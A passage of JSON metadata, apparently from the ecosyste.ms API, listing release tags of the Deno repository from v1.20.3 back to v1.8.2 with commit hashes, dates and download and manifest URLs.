tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositor